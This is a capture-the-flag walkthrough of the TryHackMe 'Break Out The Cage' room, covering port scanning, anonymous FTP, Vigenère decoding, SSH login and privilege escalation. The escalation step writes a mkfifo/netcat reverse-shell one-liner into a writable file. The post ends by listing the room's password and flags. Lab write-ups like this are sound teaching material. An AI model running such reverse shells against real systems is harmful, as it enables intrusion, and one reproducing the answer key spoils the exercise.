Room: https://tryhackme.com/room/breakoutthecage1

I'll explain everything in a simple way so even if you're new to hacking, you can follow along and learn.

Friendly Access here!

Step 1: Initial Enumeration

I started with a full port scan using Nmap:

nmap -sS -sV -vv -p- 10.201.69.190

Here's what I found:

None

Step 2: Anonymous FTP Access

I tried connecting to FTP using anonymous login:

ftp 10.201.69.190
Username: Anonymous
Password: Anonymous

It worked! and there was a file called dad_tasks. I downloaded it:

None

Step 3: Decoding the Hidden Message

When I opened dad_tasks, it was Base64 encoded. I decoded it:

None

But the result still looked weird, like encrypted text. Then after googling, found it's Vigenère Cipher and used dcode.fr Vigenere Decoder to crack it.

None

Step 4: SSH into Weston's Account

Tried logging in with SSH:

ssh weston@10.201.69.190

Password:

Mydadisghostrideraintthatcoolnocausehesonfirejokes

It worked! I was now in as user weston.

Step 5: Checking Sudo Permissions

I checked what weston could run as sudo:

None

Output:

(root) /usr/bin/bees

I viewed the script:

cat /usr/bin/bees

Output:

#!/bin/bash
wall "AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!"

It just prints a message, but I knew I had root access to this script!

Step 6: Privilege Escalation Path

I looked around the home directories:

cd /home
ls -la

Saw a user named cage, so I searched for files owned by cage:

None
find / -type f -user cage 2>/dev/null

Found:

/opt/.dads_scripts/spread_the_quotes.py
/opt/.dads_scripts/.files/.quotes

I looked at the .quotes file. It had read/write permissions. So I edited it using echo for reverse shell, as nano isn't installed in machine:

echo "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.201.97.101 4444 >/tmp/f" > /opt/.dads_scripts/.files/.quotes
None

Then I started a listener on my machine:

nc -lvnp 4444

And waited for the script to be triggered.

I got a shell as cage.

None

Step 7: User Flag

I checked cage's home & found the user flag:

None

Step 8: Checking Emails

I went into the email backup:

None

One email said:

The note said: haiinspsyanileph
None

All emails also had a weird obsession with the word "face". I thought that might be the key for another Vigenère cipher.

I used cyberchef this time with:

  • Cipher text: haiinspsyanileph
  • Key: face

Decrypted message:

None

cageisnotalegend , the root password

Step 9: Become Root

I switched to root and Went to /root/email_backup/ for root flag:

None
set tty first with python else terminal wouldn't be able to ask password
None

Found the root flag:

THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}
None
root flag

Answers, in case you were stuck:

What is Weston's password?

Mydadisghostrideraintthatcoolnocausehesonfirejokes

What's the user flag?

THM{M37AL_0R_P3N_T35T1NG}

What's the root flag?

THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}

None